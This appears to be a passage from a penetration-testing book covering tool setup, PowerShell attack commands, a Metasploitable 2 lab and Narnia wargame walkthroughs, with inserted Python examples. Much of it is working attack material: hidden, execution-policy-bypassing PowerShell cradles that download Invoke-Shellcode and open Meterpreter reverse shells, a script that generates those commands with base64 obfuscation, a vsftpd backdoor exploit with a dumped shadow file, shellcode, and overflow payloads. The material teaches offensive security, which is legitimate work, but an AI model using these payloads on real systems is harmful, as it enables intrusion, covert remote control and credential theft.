• Hyperion http://www.nullsecurity.net/tools/binary.html 

o Download/install a Windows Compiler 

http://sourceforge.net/projects/mingw/ 

o Run “make” in the extracted Hyperion folder and you should have the 
binary. 

• Download and install Metasploit http://www.Metasploit.com/ 

• Download and install either Nessus or Nexpose 

o If you are buying your own software, you should probably look into 
Nessus as it is much cheaper, but both work well 

• Download and install nmap http://nmap.org/download.html 

• Download and install oclHashcat http://hashcat.net/oclhashcat/ 

• Download and install Cain and Abel http://www.oxid.it/cain.html 

• Download Burp Proxy Pro http://portswigger.net/burp/download.html 

• Download and extract Nishang: https://github.com/samratashok/nishang 

• Download and extract PowerSploit: https://github.com/mattifestation/PowerSploit/ 

• Installing Firefox Addons 

o Web Developer Add-on: https://addons.mozilla.org/en-US/firefox/addon/web-developer/ 

o Tamper Data: https://addons.mozilla.org/en-US/firefox/addon/tamper-data/ 

o Foxy Proxy: https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/ 

o User Agent Switcher: https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher/ 


Power Up With PowerShell 


PowerShell has really changed the game in penetration testing. If you don't have any experience with 
PowerShell, I would highly recommend you take some time and write some basic PowerShell scripts. 
If you need something to help get you in the PowerShell game, take a look at this video: 

• Intro to PowerShell Scripting for Security: http://bit.ly/1MCb7EJ 

The video is kind of long, but will get you some of the basics you need to get your PowerShelling off 
the ground. 

Why do I focus so much on PowerShell in this book? The benefits of PowerShell for a penetration 
tester: 

• Installed by default on Windows 7+ machines 

• PowerShell scripts can run entirely in memory, without touching disk 

• Rarely triggered antivirus at the time of writing (AMSI, script block logging and 
current EDR products have since closed much of that gap, so expect more scrutiny on modern hosts) 

• Utilizes .NET Framework classes 

• Takes advantage of the credentials of the current user (for querying Active Directory) 

• Can be used to manage Active Directory 

• Remotely executes PowerShell scripts (PowerShell Remoting over WinRM) 

• Makes scripting Windows attacks much easier 

• Many tools are now being built in PowerShell, and understanding it will make you a 
more powerful and efficient penetration tester 


You can always drop into PowerShell from a Windows command prompt by typing 
"powershell" and get to the help menu by typing "help" once inside PowerShell. Here are the basic 
flags and settings used throughout the book: 


• -Exec Bypass (short for -ExecutionPolicy Bypass): Bypass the execution policy 

o This one is extremely important! By default, PowerShell has an 
execution policy that refuses to run script files. Passing this flag 
overrides that setting for the new process. Keep in mind that the execution 
policy is a safety feature, not a security boundary: no elevation is needed to 
bypass it. Throughout the book we will use this flag almost every time. 

• -NonI: Noninteractive Mode - PowerShell does not present an interactive prompt to 
the user 

• -NoProfile (or -NoP): Prevents the PowerShell console from loading the current user's 
profile 

• -NoExit: Do not exit the shell after execution. This is important for scripts like 
keyloggers, so that they continue to run. 

• -W Hidden (short for -WindowStyle Hidden): Sets the window style for the session so 
that the PowerShell window stays hidden. 

• 32-bit or 64-bit PowerShell: 

o This is also very important. Some scripts (for example Invoke-Shellcode with a 
given payload) are only meant to run on their specified architecture, so on a 
64-bit box you might need to explicitly launch the 64-bit or the 32-bit 
PowerShell. On 64-bit Windows, System32 holds the native 64-bit binaries 
and SysWOW64 holds the 32-bit ones. 



o 64-bit PowerShell Execution (what "powershell.exe" resolves to from a 64-bit 
command prompt): %WinDir%\System32\WindowsPowerShell\v1.0\powershell.exe 
-NoP -NonI -W Hidden -Exec Bypass 

o 32-bit PowerShell Execution: 
%WinDir%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 
-NoP -NonI -W Hidden -Exec Bypass 


To help you better understand what we will come across in the PowerShell adventures, here are some 
of the common execution commands that will be used throughout this book: 


The first command will download a PowerShell script from a web server and execute that script. In 
many cases, we are going to download a Meterpreter PowerShell script on a victim target via a 
command prompt: 

• Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX (New-Object 
Net.WebClient).DownloadString('[PowerShell URL]'); [Parameters] 


For example, if we want to execute a Meterpreter shell on a target, we need to download this script: 

• https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1 

We also need to know which parameters to use. The easiest way to find out what parameters you 
might need is to read the source code of the PowerShell script. Go visit the Invoke-Shellcode.ps1 
file. If we look at the Invoke-Shellcode.ps1 file written by Mattifestation, we can see an example of 
how to call a reverse-https Meterpreter shell. 


Invoke-Shellcode.ps1 


Our final PowerShell command will look like this: 

• Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX (New-Object 
Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1'); 
Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.30.129 -Lport 80 








This makes PowerShell extremely easy and powerful to use. Let’s look at a few more examples. 


Let’s say you downloaded the same file onto the target. You don’t want to have to reach out to a web 
page to automatically download and execute the file. To locally run it: 


• powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "& {Import- 
Module [Path and File of PowerShell Script]; [Parameters]}" 


Lastly, throughout this book, I will regularly use base64 encoded PowerShell scripts both for 
obfuscation and for compacting my code. To run an encoded PowerShell Script: 


• powershell.exe -NoP -NonI -W Hidden -Exec Bypass -enc [Base64 Code] 


Hopefully, this makes using PowerShell pretty straightforward and usable in your own tests. 


Easy-P 


Because this book is so heavily invested in PowerShell attacks, I created a little script to make 
PowerShell a little more accessible during a penetration test. Easy-P has some of the common 
PowerShell tools I use and the ability to encode my scripts. 


For every command, Easy-P will give you multiple ways to run the code both locally and remotely. 
Note that all the remote PowerShell scripts are linked to either my code or to forked versions of other 
people's code. I want to mention something here, which will be mentioned a couple more times 
throughout the book: Remember to fork your own copies off of the original sources, so that you don't 
blindly run someone else's code. You never know if someone is going to maliciously change the 
PowerShell script, and now either nothing works or, even worse, your shells are going 
somewhere else. Pin your download URLs to a commit you have reviewed rather than to a branch 
like master, and host them on infrastructure you control. Let's dive into Easy-P to make your life 
much simpler. 


• cd /opt/Easy-P 

• python ./easy-p.py 



root@kali:/opt/Easy-P# python ./easy-p.py 

PowerShell/WMI Generator 

==Easy-P Menu System== 

1. Privilege Escalation 
2. Lateral Movement 
3. Keylogging 
4. PowerShell Interpreter 
5. Change Users Execution Policy 
6. Powershell 101 
7. Base64 Encode a PowerShell Script 
8. Exit/Quit 

What would you like to do: 


THP Easy-P 


One of the most common things I will do in this book is use PowerShell Meterpreter Scripts. Once 
you execute the Easy-P script, select option 4. You will be presented with setting your localhost IP 
and the port on which you want the Meterpreter script to connect back. Once that is done, you will 
have an output similar to the following: 



What would you like to do: 4 

[*] PowerShell Metasploit Meterpreter Reverse HTTPS Shell 
LHOST: 192.168.1.100 
LPORT: 4444 

[*] Download from internet and execute: 
powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.github.com/mattifestation/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.100 -Lport 4444 -Force 

[*] Run from a local copy of the scripts: 
powershell.exe -exec bypass -Command "& {Import-Module .\Invoke-Shellcode.ps1; Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.100 -Lport 4444 -Force}" 

[*] Base64 encoded version download and execute: 
powershell.exe -NoP -NonI -W Hidden -Exec Bypass -enc [base64 blob, cut off in the screenshot] 

[*] Listener Resource Script (listener.rc) - Save the following to a file called listener.rc and load your handler with msfconsole -r listener.rc 
use multi/handler 
set payload windows/meterpreter/reverse_https 
set LHOST 192.168.1.100 
set LPORT 4444 
set ExitOnSession false 
exploit -j 


Example Easy-P Output 


You will get four different outputs: 

• Download from the Internet and execute: Download a Power Shell script from a 
website then execute that script. This is great when you only have a simple shell and 
do not have the ability to download files. 

• Run from a local copy of the script: If you have already pushed a PowerShell file to 
the system, it will output a command to import that PowerShell script and execute it. 

• Base64 encoded version of download and execute: If for some reason you want to 
obfuscate your command or you run into character limitations (quotes, parentheses), this 
will base64-encode the command and give you the matching -enc execution line. 

• Resource File: Lastly, you will be given the associated Resource File. A 
Metasploit resource file is a quick way to automatically set up a handler for the 
Meterpreter PowerShell script. Copy that resource script and save it to a file: 
/opt/listener.rc. 



All of the scripts are already configured to bypass execution policy, stay hidden, and run non¬ 
interactive. Take a look at all of the other menu choices in Easy-P, as it also has modules on Privilege 
Escalation, Lateral Movement, Keylogging, PowerShell Meterpreter, and Change Users Execution 
Policy. Feel free to fork my code and modify it to add all the PowerShell code you need. 
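The four Easy-P outputs described above, together with the flags and the 32-bit/64-bit path note from the "Power Up With PowerShell" section, can be generated with a short Python script. This is an added example, not the book's Easy-P code: it assumes the Invoke-Shellcode URL and the lab LHOST/LPORT used on the page, and it reproduces only the text generation. The one part worth studying is encode_for_enc, because -enc expects base64 of the UTF-16LE bytes of the command; encoding as UTF-8 (the usual mistake) produces a blob PowerShell cannot run.

```python
import base64

# Assumptions for this example (values taken from the page's lab): the
# Invoke-Shellcode URL and the LHOST/LPORT the handler listens on.
DEFAULT_URL = ("https://raw.githubusercontent.com/cheetz/PowerSploit/master/"
               "CodeExecution/Invoke-Shellcode.ps1")
PS_FLAGS = "-NoP -NonI -W Hidden -Exec Bypass"


def powershell_exe(want_64bit=True):
    """Path of the 64-bit or 32-bit host on 64-bit Windows. System32 holds
    the native (64-bit) binaries; SysWOW64 holds the 32-bit ones."""
    subdir = "System32" if want_64bit else "SysWOW64"
    return r"%WinDir%\{}\WindowsPowerShell\v1.0\powershell.exe".format(subdir)


def invoke_shellcode(lhost, lport, payload="windows/meterpreter/reverse_https"):
    return "Invoke-Shellcode -Payload {} -Lhost {} -Lport {} -Force".format(payload, lhost, lport)


def download_and_execute(url, call):
    """Form 1: fetch the script over HTTP(S) and run it in memory with IEX."""
    return "IEX (New-Object Net.WebClient).DownloadString('{}'); {}".format(url, call)


def run_local_copy(path, call):
    """Form 2: import a script already on disk, then call the function."""
    return '-Command "& {{Import-Module {}; {}}}"'.format(path, call)


def encode_for_enc(command):
    """Form 3: -enc takes base64 of the UTF-16LE bytes of the command.
    Encoding as UTF-8 (the usual mistake) yields a blob PowerShell rejects."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_from_enc(blob):
    """Reverse of encode_for_enc; handy for reading encoded commands in logs."""
    return base64.b64decode(blob).decode("utf-16-le")


def listener_rc(lhost, lport, payload="windows/meterpreter/reverse_https"):
    """Form 4: Metasploit resource file for the matching handler (msfconsole -r)."""
    return "\n".join([
        "use multi/handler",
        "set payload {}".format(payload),
        "set LHOST {}".format(lhost),
        "set LPORT {}".format(lport),
        "set ExitOnSession false",
        "exploit -j",
    ])


def generate(lhost, lport, url=DEFAULT_URL, local_path=r".\Invoke-Shellcode.ps1"):
    """The four outputs Easy-P's option 4 prints, keyed by name."""
    call = invoke_shellcode(lhost, lport)
    plain = download_and_execute(url, call)
    return {
        "download_execute": "powershell.exe {} {}".format(PS_FLAGS, plain),
        "local_copy": "powershell.exe {} {}".format(PS_FLAGS, run_local_copy(local_path, call)),
        "encoded": "powershell.exe {} -enc {}".format(PS_FLAGS, encode_for_enc(plain)),
        "listener_rc": listener_rc(lhost, lport),
    }


if __name__ == "__main__":
    for name, text in generate("192.168.1.100", 4444).items():
        print("[*] {}:\n{}\n".format(name, text))
```

Run it with your own LHOST/LPORT and save the listener_rc output to /opt/listener.rc; decode_from_enc is also the quickest way to see what an -enc command found in a log actually does.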


Learning 


This book is really geared toward those who have, at a minimum, some understanding of tools like 
Nmap, Metasploit, Cain and Abel, aircrack and others. You should also have a high level of 
understanding of attacks like buffer overflows and high-level languages like Python/Ruby. 


If you need a quick refresher or need to do some testing, here is a little starter pack for you: 


Metasploitable 2 


One comment I received was that there were no beginner walk-throughs on how to use Metasploit or 
fully test exploits using some of Metasploit's features. This is where Metasploitable 2 comes in as a great 
test bed. Before we get started, we need to download the VMware image for Metasploitable 2. 

Download: 

http://sourceforge.net/projects/metasploitable/files/Metasploitable2/ 


Once you download Metasploitable 2, unzip it, and open it in VMware Player or VirtualBox, log in 
with the user account msfadmin and password msfadmin. Now, you have your vulnerable VM image 
running. 

LAB 

Practice running Nmap, Masscan, or vulnerability tools against the vulnerable virtual machine. Once 
you find the system vulnerable to an exploit, let’s get a shell on it. In our example, we found and are 
going to take advantage of a flaw in vsftpd. So we can either do a search for the exploit (search 
vsftpd) or we can go straight into the exploit. 


• msfconsole 

• use exploit/unix/ftp/vsftpd_234_backdoor (selects the exploit) 

• show options (shows all the configuration options) 

• set RHOST [IP] (sets the Metasploitable 2 IP) 

• exploit (runs the exploit) 




msf > use exploit/unix/ftp/vsftpd_234_backdoor 
msf exploit(vsftpd_234_backdoor) > show options 

Module options (exploit/unix/ftp/vsftpd_234_backdoor): 

   Name   Current Setting  Required  Description 
   ----   ---------------  --------  ----------- 
   RHOST                   yes       The target address 
   RPORT  21               yes       The target port 

Exploit target: 

   Id  Name 
   --  ---- 
   0   Automatic 

msf exploit(vsftpd_234_backdoor) > set RHOST 172.16.151.145 
RHOST => 172.16.151.145 
msf exploit(vsftpd_234_backdoor) > exploit 

[*] Banner: 220 (vsFTPd 2.3.4) 
[*] USER: 331 Please specify the password. 
[+] Backdoor service has been spawned, handling... 
[+] UID: uid=0(root) gid=0(root) 
[*] Found shell. 
[*] Command shell session 1 opened (172.16.151.128:53836 -> [cut off in screenshot]) at 2015-02-22 00:00:34 -0500 

cat /etc/shadow 
root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7::: 
daemon:*:14684:0:99999:7::: 
bin:*:14684:0:99999:7::: 
sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD910:14742:0:99999:7::: 

Metasploit Example 

We were successfully able to exploit this vulnerability and read the stored passwords with: cat 
/etc/shadow. To further dig into Metasploitable 2, check out the Rapid7 guide: 

https://community.rapid7.com/docs/DOC-1875 . 
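The same check can be done by hand, which is useful for understanding what exploit/unix/ftp/vsftpd_234_backdoor actually does and for verifying a finding without Metasploit. The following is an added example, not code from the book or from Metasploit. The trigger it relies on is the documented behaviour of the vsftpd 2.3.4 backdoor (CVE-2011-2523): a USER name containing ":)" makes the daemon open a root shell on TCP port 6200. The FakeVsftpd class is a constructed stand-in so the script can be exercised offline; point check_vsftpd_backdoor at your Metasploitable 2 IP for the real thing.

```python
import socket
import threading

# Documented behaviour of the vsftpd 2.3.4 backdoor (CVE-2011-2523), not taken
# from the page: a USER name containing ":)" makes the daemon open a root
# shell on TCP 6200. Metasploit's module checks the same two things below.
TRIGGER_USER = b"USER letmein:)\r\n"
BACKDOOR_PORT = 6200


def check_vsftpd_backdoor(host, port=21, shell_port=BACKDOOR_PORT, timeout=2.0):
    """Manual equivalent of exploit/unix/ftp/vsftpd_234_backdoor.
    Returns the shell's reply to `id` (e.g. "uid=0(root) ...") or None."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as ftp:
            banner = ftp.recv(1024)
            if b"vsFTPd 2.3.4" not in banner:
                return None                      # only this release was trojaned
            ftp.sendall(TRIGGER_USER)
            try:
                ftp.recv(1024)                   # "331 Please specify the password."
            except socket.timeout:
                pass                             # the real daemon may stall here
            ftp.sendall(b"PASS anything\r\n")
        with socket.create_connection((host, shell_port), timeout=timeout) as sh:
            sh.sendall(b"id\n")
            reply = sh.recv(1024)
    except OSError:                              # refused, reset or timed out
        return None
    return reply.decode(errors="replace").strip() if reply.startswith(b"uid=") else None


class FakeVsftpd(threading.Thread):
    """Constructed stand-in for a backdoored vsftpd so the check runs offline.
    Binds ephemeral loopback ports; the shell port only starts listening
    after a smiley USER arrives, like the real trigger."""

    def __init__(self, banner=b"220 (vsFTPd 2.3.4)\r\n"):
        super().__init__(daemon=True)
        self.banner = banner
        self.ftp = socket.socket()
        self.ftp.bind(("127.0.0.1", 0))
        self.ftp.listen(1)
        self.shell = socket.socket()
        self.shell.bind(("127.0.0.1", 0))
        self.ftp_port = self.ftp.getsockname()[1]
        self.shell_port = self.shell.getsockname()[1]

    def run(self):
        conn, _ = self.ftp.accept()
        with conn:
            conn.sendall(self.banner)
            user = conn.recv(1024)
            if not user:
                return                           # client gave up after the banner
            triggered = b":)" in user and b"2.3.4" in self.banner
            if triggered:
                self.shell.listen(1)             # "spawn" the shell service before replying
            conn.sendall(b"331 Please specify the password.\r\n")
            conn.recv(1024)                      # wait for PASS (or EOF) before closing
        if triggered:
            sh, _ = self.shell.accept()
            with sh:
                if sh.recv(1024).strip() == b"id":
                    sh.sendall(b"uid=0(root) gid=0(root) groups=0(root)\n")


if __name__ == "__main__":
    target = FakeVsftpd()
    target.start()
    print(check_vsftpd_backdoor("127.0.0.1", target.ftp_port, target.shell_port))
```

Against a real host, a None result after a matching banner usually means the backdoor listener was already consumed by an earlier connection or a firewall blocks 6200; the banner check alone is not proof either way.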


There are a ton of different vulnerabilities on this virtual machine. Make sure you spend time learning 
how to effectively use Metasploit and Meterpreter. If you are looking to get deeper into Metasploit, I 
recommend: 

http://www.amazon.com/Metasploit-The-Penetration-Testers-Guide/dp/159327288X . 


Binary Exploitation 


Just like in the first edition of The Hacker Playbook, this book does not go deeply into binary 
exploitation, because this is a whole other topic that requires something like The Shellcoder's 
Handbook (http://amzn.to/1E3k89R) or Hacking: The Art of Exploitation, 2nd Edition 
(http://amzn.to/1z8oThD). However, this doesn't mean that you shouldn't have an understanding of 
buffer overflows and basic exploitation. Since all penetration testers should be able to “script” code, 
they should also be able to read other exploitation code. You might find a module in Metasploit that 
does not work and needs minor modifications or verification of what it does before you download an 
exploit from the Internet. 








There are a ton of different sites you can start with to get the basics down on binary exploitation. A 
great place to learn is on a site called Over the Wire (http://overthewire.org/wargames/narnia/). 
Over the Wire is an online CTF-style challenge that focuses on all aspects of hacking from binary to 
web. In this chapter, we are only going focus on binary exploitation. If you have never done anything 
like this before, I would take a couple of weekends to hammer away at this site. To get you started, I 
will walk you through the first couple of challenges—however, it is up to you to continue down the 
path. 

Before you begin, study up a bit on: 

• Basic assembly and understanding registers 

• The basics on GDB (GNU Debugger) 

• Understand the different memory segments (the stack, heap, data, BSS, and code 
segments) 

• Shellcode basics 


Some resources that might help you start: 

• http://opensecuritytraining.info/IntroX86.html 

• http://www.reddit.com/r/hacking/comments/1wy610/exploit_tutorial_buffer_overflo 

• https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/ 

• http://www.lethalsecurity.com/wiki 

• http://opensecuritytraining.info/Exploits1.html 

• https://exploit-exercises.com/protostar/ 


Narnia Setup 

(http://overthewire.org/wargames/narnia/) 


Stage 1 

Narnia is configured so that you SSH into their servers and all challenges are located under /narnia/. 
Let's walk through the first three examples. From a terminal prompt on Kali or using something like 
PuTTY (http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html) on Windows: 

• ssh narnia0@narnia.labs.overthewire.org 

• Password: narnia0 

• cd /narnia/ 


Each challenge is laid out in a manner that shows you both the C code and the binary executable. For 
challenge 0, we have both a narnia0 and narnia0.c file. Let's take a look at the raw C code: 

• cat narnia0.c 













narnia0@melinda:/narnia$ cat narnia0.c 
/* 
    This program is free software; you can redistribute it and/or modify 
    it under the terms of the GNU General Public License as published by 
    the Free Software Foundation; either version 2 of the License, or 
    (at your option) any later version. 

    This program is distributed in the hope that it will be useful, 
    but WITHOUT ANY WARRANTY; without even the implied warranty of 
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the 
    GNU General Public License for more details. 

    You should have received a copy of the GNU General Public License 
    along with this program; if not, write to the Free Software 
    Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA 
*/ 
#include <stdio.h> 
#include <stdlib.h> 

int main(){ 
    long val=0x41414141; 
    char buf[20]; 

    printf("Correct val's value from 0x41414141 -> 0xdeadbeef!\n"); 
    printf("Here is your chance: "); 
    scanf("%24s",&buf); 

    printf("buf: %s\n",buf); 
    printf("val: 0x%08x\n",val); 

    if(val==0xdeadbeef) 
        system("/bin/sh"); 
    else { 
        printf("WAY OFF!!!!\n"); 
        exit(1); 
    } 

    return 0; 
} 

Narnia 0 - Code 


After taking a quick look at the code, we see the variable "val" is initialized to 0x41414141, the hex 
value of "AAAA". Next, we see that buf is declared with a length of 20 bytes. A few lines later, we see 
that scanf("%24s") will read up to 24 bytes into it, four more than it holds. This is a very simple 
buffer overflow example: on the stack, buf sits directly below val, so the four extra bytes land in val. 
Now, let's run the executable and, as a test, supply it 20 A's and 4 B's (because we know the hex value 
of A = 0x41 and B = 0x42). So at the command prompt, it should look something like this: 


• narnia0@melinda:/narnia$ ./narnia0 

• Correct val's value from 0x41414141 -> 0xdeadbeef! 

• Here is your chance: AAAAAAAAAAAAAAAAAAAABBBB 

• buf: AAAAAAAAAAAAAAAAAAAABBBB 

• val: 0x42424242 

• WAY OFF!!!! 


Great! Since the hex value at "val" is 0x42424242 (0x42 is the ASCII letter B), we know that 
we are able to overwrite the value of "val" in memory, which was previously 0x41414141. All we 
have to do now is overwrite this value in memory with 0xdeadbeef. The thing to remember is that 
x86 stores multi-byte values in Little Endian format 
(http://en.wikipedia.org/wiki/Endianness): the least significant byte of 0xdeadbeef (0xef) sits at the 
lowest address, so it must be the first byte written after buf. This is a property of the CPU's byte 
ordering, not of the stack's push/pop discipline. So, to supply our 0xdeadbeef 
value, we will have to write it as "\xef\xbe\xad\xde". The easiest way to supply raw hex bytes along with 
our A's is to use python and pipe its output into our narnia0 example. Let's see this in action: 


• narnia0@melinda:/narnia$ python -c 'print "A"*20 + "\xef\xbe\xad\xde"' | ./narnia0 

• Correct val's value from 0x41414141 -> 0xdeadbeef! 

• Here is your chance: buf: AAAAAAAAAAAAAAAAAAAA[4 non-printable bytes] 

• val: 0xdeadbeef 

Great x2! We have now written 0xdeadbeef into our "val" variable. How can we run shell commands? If 
we go back to our C code, we see that if val matches 0xdeadbeef, /bin/sh gets called. Note that the 
spawned shell reads its commands from the same stdin pipe, so once python's output has been consumed 
it would hit EOF and exit immediately; we therefore append the command we want it to run (echo a 
command, or use cat instead of echo to keep the shell interactive). Let's take our python code and try to 
read the key located at /etc/narnia_pass/narnia1: 

• narnia0@melinda:/narnia$ (python -c 'print "A"*20 + "\xef\xbe\xad\xde"'; echo 'cat 
/etc/narnia_pass/narnia1') | /narnia/narnia0 

• Correct val's value from 0x41414141 -> 0xdeadbeef! 

• Here is your chance: buf: AAAAAAAAAAAAAAAAAAAA[4 non-printable bytes] 

• val: 0xdeadbeef 

• [Answer to Stage 1] 


narnia0@melinda:/narnia$ (python -c 'print "A"*20 + "\xef\xbe\xad\xde"'; echo 'cat /etc/narnia_pass/narnia1') | /narnia/narnia0 
Correct val's value from 0x41414141 -> 0xdeadbeef! 
Here is your chance: buf: AAAAAAAAAAAAAAAAAAAA[4 non-printable bytes] 
val: 0xdeadbeef 
efeidiedae 

Narnia 0 - Exploit 


If you were successful, you have defeated stage 1 and earned the password to the narnia1 account. We 
need to log out and log into the newly gathered account. 
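To make the byte-ordering point concrete, here is an added Python example (not from the book or from OverTheWire) that builds the narnia0 payload with struct.pack and models the stack frame the program reads it into: buf[20] followed directly by the 4-byte val, with scanf("%24s") copying at most 24 bytes. The frame layout is taken from the behaviour observed above (val became 0x42424242 after 20 A's and 4 B's); the whitespace check and the stdin helper are assumptions about how the input travels through scanf and the pipe, not something the page states.

```python
import struct

BUF_LEN = 20              # char buf[20]
INITIAL_VAL = 0x41414141  # long val = 0x41414141
TARGET = 0xdeadbeef
SCANF_STOP = set(b" \t\n\v\f\r")  # "%24s" stops reading at the first whitespace byte


def build_payload(value=TARGET, filler=b"A"):
    """20 bytes to fill buf, then `value` packed little-endian: 0xdeadbeef
    becomes ef be ad de, so its low byte is the first byte written after buf.
    A target containing a whitespace byte cannot be delivered through %s."""
    payload = filler * BUF_LEN + struct.pack("<I", value)
    bad = [b for b in payload if b in SCANF_STOP]
    if bad:
        raise ValueError("byte 0x%02x is whitespace; scanf(\"%%24s\") would stop there" % bad[0])
    return payload


def run_narnia0(user_input):
    """Model of narnia0's frame: buf[20] directly below the 4-byte val.
    scanf("%24s") copies at most 24 bytes, so bytes 20..23 of the input land
    in val (the terminating NUL goes to buf[24], just past val, harmless here).
    Returns (val as the program prints it, whether /bin/sh would run)."""
    frame = bytearray(b"\x00" * BUF_LEN + struct.pack("<I", INITIAL_VAL))
    data = user_input[:BUF_LEN + 4]
    frame[:len(data)] = data
    val = struct.unpack("<I", frame[BUF_LEN:BUF_LEN + 4])[0]
    return val, val == TARGET


def stdin_for_shell(command):
    """Everything to pipe into ./narnia0: the overflow line for scanf, then the
    command the spawned /bin/sh reads from the same pipe (without it the shell
    sees EOF and exits immediately)."""
    return build_payload() + b"\n" + command.encode() + b"\n"


if __name__ == "__main__":
    val, shell = run_narnia0(build_payload())
    print("val: 0x%08x, shell: %s" % (val, shell))
    print(stdin_for_shell("cat /etc/narnia_pass/narnia1"))
```

Packing the same value big-endian (">I") lands 0xefbeadde in val, which is exactly the "WAY OFF" result you get when the byte order is wrong.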


Stage 2 

After you finish each stage, you get the password to the next account. Let's log into stage 2 using the 
narnia1 account we just obtained. 

Log into stage 2: 

• ssh narnia1@narnia.labs.overthewire.org 

• Password: [Password From Narnia 1] 

• cd /narnia/ 

• cat narnia1.c 



int main(){ 
    int (*ret)(); 

    if(getenv("EGG")==NULL){ 
        printf("Give me something to execute at the env-variable EGG\n"); 
        exit(1); 
    } 

    printf("Trying to execute EGG!\n"); 
    ret = getenv("EGG"); 
    ret(); 

Narnia 1 - Code 


Reading the C code, we see a couple of things immediately: 

• int (*ret)(); - declares ret as a pointer to a function that returns an int 

• getenv - looks up the environment variable EGG and stores the address of its value in ret 

• Calls ret(), which jumps to the bytes stored in EGG and executes them as code 

If we can store shellcode in the environment variable EGG, then whatever shellcode is stored there 
will be executed. The easy way to do this is to take the shellcode for /bin/sh and set it as the 
environment variable EGG. 


• We will use the shellcode for /bin/sh from this example: 
http://shell-storm.org/shellcode/files/shellcode-811.php 

• export EGG=`python -c 'print 
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x 

• ./narnia1 

• cat /etc/narnia_pass/narnia2 

narnia1@melinda:/narnia$ export EGG=`python -c 'print "\x31\xc0\x50 [shellcode cut off in screenshot] 
\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0 
narnia1@melinda:/narnia$ ./narnia1 
Trying to execute EGG! 
$ cat /etc/narnia_pass/narnia2 
nairiepecu 

I 


Narnia 1 - Exploit 


We now have the password to the narnia2 account and can move on to stage 3. 




Stage 3 

For stage 3: 

• ssh narnia2@narnia.labs.overthewire.org 

• Password: [Password from Narnia 2] 

• cd /narnia/ 

• cat narnia2.c 

Looking at the C code, we see the following: 

• char buf[128]; 

• if(argc == 1){ 

• printf("Usage: %s argument\n", argv[0]); 

• exit(1); 

• } 

• strcpy(buf,argv[1]); 

• printf("%s", buf); 


By looking at the code, we see that it takes a command-line argument and copies it into buf with 
strcpy, which performs no length check. We see that buf is 128 bytes, so let's start by sending 200 
characters: 

• narnia2@melinda:/narnia$ ./narnia2 `python -c 'print "A" * 200'` 

• Segmentation fault 

We just verified that sending 200 characters causes the application to have a segmentation fault. We 
need to identify how many bytes it takes before we overwrite EIP (the saved return address on the 
stack). We can do this with a Metasploit tool called pattern_create.rb. This tool creates a cyclic string 
in which no 4-byte sequence repeats, and in our example below we will create a string of 200 bytes. 
Since no 4-byte window repeats, the value that ends up in EIP identifies exactly where our 
program overflows it. 


• /usr/share/metasploit-framework/tools/pattern_create.rb 200 

• Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab 

Now, let’s run our new custom unique string through narnia2 to see how many bytes it takes before 
we cause a segmentation fault. To see the exact results of our segmentation fault, we will have to use 
a debugger. By default, Linux systems have a debugger called gdb. Although it isn’t the easiest 
debugger to use, it is extremely powerful: 


• gdb ./narnia2 -q 

• run `python -c 'print 
"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9 


The result of the query is: 



narnia2@melinda:/narnia$ gdb ./narnia2 -q 
Reading symbols from ./narnia2...(no debugging symbols found)...done. 
(gdb) run `python -c 'print "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3A [cut off in screenshot] 
Starting program: /games/narnia/narnia2 `python -c 'print "Aa0Aa1Aa2Aa3A [cut off in screenshot] 

Program received signal SIGSEGV, Segmentation fault. 
0x37654136 in ?? () 

Narnia 2 - Exploit 


• Program received signal SIGSEGV, Segmentation fault. 

• 0x37654136 in ?? () 

The crash address from our command is 0x37654136. We need to look in our original string to find that 
exact value. Read as little-endian bytes, 0x37654136 is the ASCII sequence "6Ae7", which occurs only 
once in the pattern. To find the exact number of bytes at which the overwrite happens, we can use 
Metasploit's pattern_offset.rb: 

• /usr/share/metasploit-framework/tools/pattern_offset.rb 0x37654136 

• [*] Exact match at offset 140 

This shows that after 140 bytes, the next 4 bytes of input land in EIP. To verify this, we can run narnia2 
with an input of 140 bytes of padding followed by 4 bytes of "B", and EIP should read 0x42424242. We 
are going to use a debugger to watch it happen in memory. 


The output should look like the following: 

• cd /narnia 

• gdb ./narnia2 -q 

• (gdb) run `python -c 'print "A" * 140 + "B" * 4'` 

o Starting program: /games/narnia/narnia2 `python -c 'print "A" * 140 
+ "B" * 4'` 


o Program received signal SIGSEGV, Segmentation fault. 
o 0x42424242 in ??() 

• (gdb) info registers 

o eax 0x0 0 
o ecx 0x0 0 
o edx 0xf7fcb898 -134432616 
o ebx 0xf7fca000 -134438912 
